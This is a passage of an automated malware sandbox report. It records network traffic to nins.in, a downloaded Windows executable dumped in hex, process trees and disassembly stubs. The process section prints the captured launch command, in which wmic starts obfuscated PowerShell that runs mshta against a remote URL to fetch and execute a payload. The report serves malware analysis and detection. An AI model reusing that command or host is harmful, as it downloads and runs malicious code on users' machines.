          Dec 8, 2024 09:52:06.756985903 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.966698885 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.966708899 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.967657089 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.007961035 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.008745909 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.030667067 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.030874968 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.047641039 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.048471928 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.256501913 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.256510019 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.256622076 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.301635981 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.301748991 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.318622112 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.318865061 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.334738970 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.334897995 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.546123028 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.546134949 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.546252966 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.587263107 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.587363958 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.603549004 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.603636026 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.619978905 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.620066881 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.838306904 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.838318110 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.838443995 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.877616882 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.877758980 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.895410061 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.895499945 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:07.913739920 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:07.913815022 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.448529959 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.448539972 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.448688030 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.463896036 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.464044094 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.483272076 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.483359098 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.500180006 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.500250101 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.516109943 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.516293049 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.532514095 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.532603979 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.553734064 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.553824902 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.747359991 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.747437954 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.760886908 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.760967016 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:08.794697046 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:08.794795990 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.039042950 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.039058924 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.039208889 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.052762985 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.052829981 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.085612059 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.085717916 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.324268103 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.324276924 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.324352980 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.339127064 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.339194059 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.352473974 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.352561951 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.429817915 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.429915905 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.617396116 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.617522955 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.632074118 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.632163048 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.670264006 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.670351982 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.769644022 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.769725084 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.915803909 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.915885925 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.915915966 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.915934086 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:09.915955067 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.915987015 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.919209003 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:09.919225931 CET44349704216.10.240.70192.168.2.5

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Dec 8, 2024 09:51:59.711761951 CET6069953192.168.2.51.1.1.1
          Dec 8, 2024 09:52:00.706374884 CET6069953192.168.2.51.1.1.1
          Dec 8, 2024 09:52:01.723553896 CET6069953192.168.2.51.1.1.1
          Dec 8, 2024 09:52:01.852212906 CET53606991.1.1.1192.168.2.5
          Dec 8, 2024 09:52:01.852245092 CET53606991.1.1.1192.168.2.5
          Dec 8, 2024 09:52:01.871305943 CET53606991.1.1.1192.168.2.5

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 8, 2024 09:51:59.711761951 CET192.168.2.51.1.1.10x28deStandard query (0)nins.inA (IP address)IN (0x0001)false
          Dec 8, 2024 09:52:00.706374884 CET192.168.2.51.1.1.10x28deStandard query (0)nins.inA (IP address)IN (0x0001)false
          Dec 8, 2024 09:52:01.723553896 CET192.168.2.51.1.1.10x28deStandard query (0)nins.inA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 8, 2024 09:52:01.852212906 CET1.1.1.1192.168.2.50x28deNo error (0)nins.in216.10.240.70A (IP address)IN (0x0001)false
          Dec 8, 2024 09:52:01.852245092 CET1.1.1.1192.168.2.50x28deNo error (0)nins.in216.10.240.70A (IP address)IN (0x0001)false
          Dec 8, 2024 09:52:01.871305943 CET1.1.1.1192.168.2.50x28deNo error (0)nins.in216.10.240.70A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • nins.in

          HTTPS Proxied Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549704216.10.240.704435756C:\Windows\System32\mshta.exe
          TimestampBytes transferredDirectionData
          2024-12-08 08:52:03 UTC335OUTGET /cembra/power/powersearch HTTP/1.1
          Accept: */*
          Accept-Language: en-CH
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: nins.in
          Connection: Keep-Alive
          2024-12-08 08:52:04 UTC209INHTTP/1.1 200 OK
          Date: Sun, 08 Dec 2024 08:52:04 GMT
          Server: Apache
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Last-Modified: Sun, 08 Dec 2024 08:09:18 GMT
          Accept-Ranges: bytes
          Content-Length: 464688
          2024-12-08 08:52:04 UTC7983INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
          2024-12-08 08:52:05 UTC8000INData Raw: 74 00 00 00 00 52 65 74 75 72 6e 48 72 00 00 00 00 4c 6f 67 4e 74 00 00 00 4c 6f 67 48 72 00 00 00 46 61 69 6c 46 61 73 74 00 00 00 00 25 00 68 00 73 00 28 00 25 00 75 00 29 00 5c 00 25 00 68 00 73 00 21 00 25 00 70 00 3a 00 20 00 00 00 00 00 25 00 68 00 73 00 21 00 25 00 70 00 3a 00 20 00 00 00 00 00 28 00 63 00 61 00 6c 00 6c 00 65 00 72 00 3a 00 20 00 25 00 70 00 29 00 20 00 00 00 25 00 68 00 73 00 28 00 25 00 64 00 29 00 20 00 74 00 69 00 64 00 28 00 25 00 78 00 29 00 20 00 25 00 30 00 38 00 58 00 20 00 25 00 77 00 73 00 00 00 00 00 20 00 20 00 20 00 20 00 00 00 00 00 4d 00 73 00 67 00 3a 00 5b 00 25 00 77 00 73 00 5d 00 20 00 00 00 00 00 43 00 61 00 6c 00 6c 00 43 00 6f 00 6e 00 74 00 65 00 78 00 74 00 3a 00 5b 00 25 00 68 00 73 00 5d 00 20 00 00 00
          Data Ascii: tReturnHrLogNtLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs]
          2024-12-08 08:52:05 UTC8000INData Raw: cc cc cc cc b9 0e 00 07 80 e9 2c f6 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 56 8b f1 e8 4a 00 00 00 f6 45 08 01 74 07 56 e8 cf 9e 00 00 59 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 56 8b f1 e8 7c 05 00 00 f6 45 08 01 74 07 56 e8 9f 9e 00 00 59 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc 8b ff 56 8b f1 57 8b be ac 00 00 00 c7 06 cc 10 40 00 85 ff 74 0f 8b cf ff 15 b4 20 41 00 57 e8 6d 9e 00 00 59 5f 8b ce 5e ff 25 a0 21 41 00 cc cc cc cc cc cc 8b ff 55 8b ec 53 56 57 8b da 8b f1 68 bc 00 00 00 6a 08 83 23 00 ff 15 f4 21 41 00 50 ff 15 f0 21 41 00 8b f8 85 ff 74 25 8b cf ff 15 9c 21 41 00 83 a7 ac 00 00 00 00 8d 8f b4 00 00 00 68 78 12 41 00 c7 07 bc 11 40 00 e8 4d fd ff ff 8b 45 0c 83
          Data Ascii: ,UVJEtVY^]UV|EtVY^]VW@t AWmY_^%!AUSVWhj#!AP!At%!AhxA@ME
          2024-12-08 08:52:05 UTC8000INData Raw: 0d 00 00 00 00 59 5e c9 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a ff 68 9c f9 40 00 64 a1 00 00 00 00 50 56 a1 04 13 41 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 35 4c 1c 41 00 85 f6 75 1d 68 98 1e 40 00 e8 f6 fe ff ff 50 ff 15 88 22 41 00 8b f0 89 35 4c 1c 41 00 85 f6 74 10 ff 75 0c 8b ce ff 75 08 ff 15 4c 24 41 00 ff d6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a 00 51 68 68 22 40 00 6a 2b ff 75 0c ff 75 08 ff 15 28 20 41 00 83 c4 18 5d c2 08 00 cc cc cc cc cc cc 8b ff 55 8b ec 6a 00 6a 04 8d 45 10 50 51 68 68 22 40 00 6a 2b ff 75 0c ff 75 08 ff 15 28 20 41 00 83 c4 20 5d c2 0c 00 cc cc cc cc cc cc 8b ff 55 8b ec 51 51 53 56 8b 75 14 57 33 ff 89 4d
          Data Ascii: Y^Ujh@dPVA3PEd5LAuh@P"A5LAtuuL$AMdY^UjQhh"@j+uu( A]UjjEPQhh"@j+uu( A ]UQQSVuW3M
          2024-12-08 08:52:05 UTC8000INData Raw: 75 f0 ff 15 64 20 41 00 c9 c2 04 00 cc cc cc cc cc cc 68 48 02 00 00 b8 7c fd 40 00 e8 05 6f 00 00 8b 45 08 8b 7d 10 8b 5d 0c 89 85 e0 fd ff ff 8d 85 d0 fd ff ff 50 51 6a 03 6a 00 51 68 20 14 41 00 68 01 00 00 80 8b cf e8 9d da ff ff 8b f0 85 f6 74 35 a1 38 10 41 00 3d 38 10 41 00 74 15 f6 40 1c 08 74 0f 56 ff 70 14 ff 70 10 6a 29 59 e8 0b e1 ff ff 85 f6 7e 09 0f b7 f6 81 ce 00 00 07 80 8b c6 e9 2f 03 00 00 51 8d 8d ac fd ff ff e8 87 08 00 00 83 65 fc 00 8b 85 e0 fd ff ff 8b 00 89 85 e0 fd ff ff 85 c0 74 31 8d 85 e0 fd ff ff 50 e8 42 09 00 00 8b f0 8b 0e e8 be 0f 00 00 83 78 2c 01 74 0d ff 36 8d 8d ac fd ff ff e8 6b 08 00 00 83 bd e0 fd ff ff 00 75 cf 68 78 12 41 00 8d 8d e0 fd ff ff e8 dc be ff ff 8d 95 ac fd ff ff c6 45 fc 01 8d 8d e0 fd ff ff e8 75 f4
          Data Ascii: ud AhH|@oE}]PQjjQh Aht58A=8At@tVppj)Y~/Qet1PBx,t6kuhxAEu
          2024-12-08 08:52:05 UTC8000INData Raw: 24 41 00 ff d6 8b f0 85 f6 78 27 8b 85 e4 fd ff ff 57 68 c0 01 00 00 6a 01 8b 08 ff b5 e0 fd ff ff 57 8b 71 30 8b ce 50 ff 15 4c 24 41 00 ff d6 8b f0 8d 8d e4 fd ff ff e8 0e 00 00 00 8b c6 e8 3f 4f 00 00 c3 cc cc cc cc cc cc 8b ff 55 8b ec 6a ff 68 9c f9 40 00 64 a1 00 00 00 00 50 56 a1 04 13 41 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 85 c9 74 10 8b 01 51 8b 70 08 8b ce ff 15 4c 24 41 00 ff d6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c3 cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 51 56 8b 75 0c ba 04 01 00 00 2b f1 8d 82 fa fe ff 7f 85 c0 74 1b 0f b7 04 0e 66 85 c0 74 0b 66 89 01 83 c1 02 83 ea 01 75 e2 85 d2 75 03 83 e9 02 f7 da 5e 1b d2 81 e2 86 ff f8 7f 33 c0 66 89 01 8d 82 7a 00 07 80 c9 c2 0c 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 40 a1 04
          Data Ascii: $Ax'WhjWq0PL$A?OUjh@dPVA3PEdtQpL$AMdY^UQVu+tftfuu^3fzU@
          2024-12-08 08:52:05 UTC8000INData Raw: 68 ff ff ff d9 42 48 dd 95 60 ff ff ff d9 42 5c dd 95 58 ff ff ff dd 45 d8 de cc dd 45 b8 de cd d9 cb de c4 dd 45 c0 de ca d9 cb de c1 d9 ca de cc d9 c9 de c3 d8 c9 de c2 d9 c9 d9 9d 14 ff ff ff d9 42 24 dd 95 50 ff ff ff d9 42 10 dd 95 30 ff ff ff d9 42 38 dd 95 48 ff ff ff d9 42 4c dd 95 40 ff ff ff d9 42 60 dd 95 38 ff ff ff dd 45 d8 de cc dd 45 b8 de cd d9 cb de c4 dd 45 c0 de ca d9 cb de c1 dd 85 c8 fe ff ff de cb de c2 de ca de c1 d9 9d 10 ff ff ff d9 41 18 d9 41 14 d9 41 1c d9 41 20 d9 41 24 d9 c3 dc 4d a0 d9 c5 dc 4d a8 de c1 d9 c3 dc 4d c8 de c1 d9 c2 dc 4d d0 de c1 d9 c1 dc 4d b0 de c1 d9 9d 0c ff ff ff d9 c3 dc 4d f8 d9 c5 dc 4d e0 de c1 d9 c3 dc 4d e8 de c1 d9 c2 dc 4d f0 de c1 d9 c1 dc 8d 28 ff ff ff de c1 d9 9d 08 ff ff ff d9 c3 dc 8d 20 ff
          Data Ascii: hBH`B\XEEEB$PB0B8HBL@B`8EEEAAAA A$MMMMMMMMM(
          2024-12-08 08:52:05 UTC8000INData Raw: ff 15 fc 21 41 00 5e c9 c3 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 34 53 56 57 e8 65 ff ff ff 8b 4d 08 be 00 00 40 00 c7 45 cc 24 00 00 00 89 4d d0 8b 41 04 8b 59 08 03 c6 8b 51 0c 03 de 8b 79 10 03 d6 03 fe 89 5d fc 8b 71 14 81 c6 00 00 40 00 89 45 d8 89 75 f0 8b 71 1c 89 75 f8 8b 75 0c 89 75 d4 33 f6 f7 01 01 00 00 00 89 75 dc 89 75 e0 89 75 e4 89 75 e8 89 75 ec 75 24 8d 45 cc 89 45 fc e8 42 ff ff ff 8d 45 fc 50 6a 01 56 68 57 00 6d c0 ff 15 e0 21 41 00 33 c0 e9 1c 02 00 00 8b 45 0c 8b 33 2b c2 c1 f8 02 89 45 f4 8b 0c 87 8b c1 c1 e8 1f f7 d0 83 e0 01 89 45 dc 8d 81 02 00 40 00 75 03 0f b7 c1 8b 1d 18 31 40 00 33 ff 89 45 e0 85 db 74 19 8d 45 cc 8b cb 50 57 ff 15 4c 24 41 00 ff d3 8b f8 85 ff 0f 85 a1 01 00 00 85 f6 0f 85 d8 00 00 00 8b 1d 18 31 40 00 85
          Data Ascii: !A^U4SVWeM@E$MAYQy]q@Euquuu3uuuuuu$EEBEPjVhWm!A3E3+EE@u1@3EtEPWL$A1@
          2024-12-08 08:52:05 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff cf fd 40 00 22 05 93 19 01 00 00 00 30 06 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff fd 40 00 22 05 93 19 01 00 00 00 5c 06 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 2f fe 40 00 22 05 93 19 07 00 00 00 88 06 41 00 01 00 00 00 c0 06 41 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 82 fe 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a fe 40 00 03 00 00 00 92 fe 40 00 03 00 00 00 9c fe 40 00 05 00 00 00 60 f7 40 00 01 00 00 00 01 00 00 00 02 00 00 00 01 00 00 00 d4 06 41 00 08 00 00 00 d8 12 41 00 d8 ff ff ff 71 9b 40 00 00 00 00 00 22 05 93 19 09 00
          Data Ascii: @"0A@"\A/@"AA@@@@`@AAq@"
          2024-12-08 08:52:06 UTC8000INData Raw: 57 00 00 26 03 53 65 74 44 65 73 6b 74 6f 70 43 6f 6c 6f 72 54 72 61 6e 73 66 6f 72 6d 00 00 02 00 50 6c 61 79 53 6f 75 6e 64 53 65 72 76 65 72 49 6e 69 74 69 61 6c 69 7a 65 00 50 6c 61 79 53 6e 64 53 72 76 2e 44 4c 4c 00 00 06 00 41 63 63 65 73 73 69 62 6c 65 4f 62 6a 65 63 74 46 72 6f 6d 57 69 6e 64 6f 77 00 00 4f 4c 45 41 43 43 2e 64 6c 6c 00 00 5d 00 43 6f 49 6e 69 74 69 61 6c 69 7a 65 00 00 8e 00 43 6f 55 6e 69 6e 69 74 69 61 6c 69 7a 65 00 00 28 00 43 6f 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 00 00 6f 6c 65 33 32 2e 64 6c 6c 00 4f 4c 45 41 55 54 33 32 2e 64 6c 6c 00 00 55 78 54 68 65 6d 65 2e 64 6c 6c 00 b0 01 53 68 65 6c 6c 45 78 65 63 75 74 65 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 49 00 50 61 74 68 46 69 6c 65 45 78 69 73 74 73 57 00 53 48
          Data Ascii: W&SetDesktopColorTransformPlaySoundServerInitializePlaySndSrv.DLLAccessibleObjectFromWindowOLEACC.dll]CoInitializeCoUninitialize(CoCreateInstanceole32.dllOLEAUT32.dllUxTheme.dllShellExecuteWSHELL32.dllIPathFileExistsWSH


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:03:51:56
          Start date:08/12/2024
          Path:C:\Windows\System32\wbem\WMIC.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch"
          Imagebase:0x7ff643e60000
          File size:576'000 bytes
          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:1
          Start time:03:51:56
          Start date:08/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:2
          Start time:03:51:56
          Start date:08/12/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch
          Imagebase:0x7ff7be880000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:3
          Start time:03:51:56
          Start date:08/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:03:51:58
          Start date:08/12/2024
          Path:C:\Windows\System32\mshta.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearch
          Imagebase:0x7ff693b20000
          File size:14'848 bytes
          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:false

          General

          Target ID:6
          Start time:03:52:04
          Start date:08/12/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Imagebase:0x7ff7e52b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Disassembly

          Reset < >

            Executed Functions

            Function 0000028C66310FB1 Relevance: .0, Instructions: 5COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.3261726706.0000028C66310000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000028C66310000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_28c66310000_mshta.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
            • Instruction ID: c13bad6b157fd598b754f2ce8234a2d66fdcb1fb954ab699c35140a28688cb23
            • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
            • Instruction Fuzzy Hash: 1490024849641755D41421910C4A65CA08463C8190FE484A0543690145EE5D02A613A6
            Function 0000028C66310FA9 Relevance: .0, Instructions: 5COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.3261726706.0000028C66310000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000028C66310000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_28c66310000_mshta.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
            • Instruction ID: c13bad6b157fd598b754f2ce8234a2d66fdcb1fb954ab699c35140a28688cb23
            • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
            • Instruction Fuzzy Hash: 1490024849641755D41421910C4A65CA08463C8190FE484A0543690145EE5D02A613A6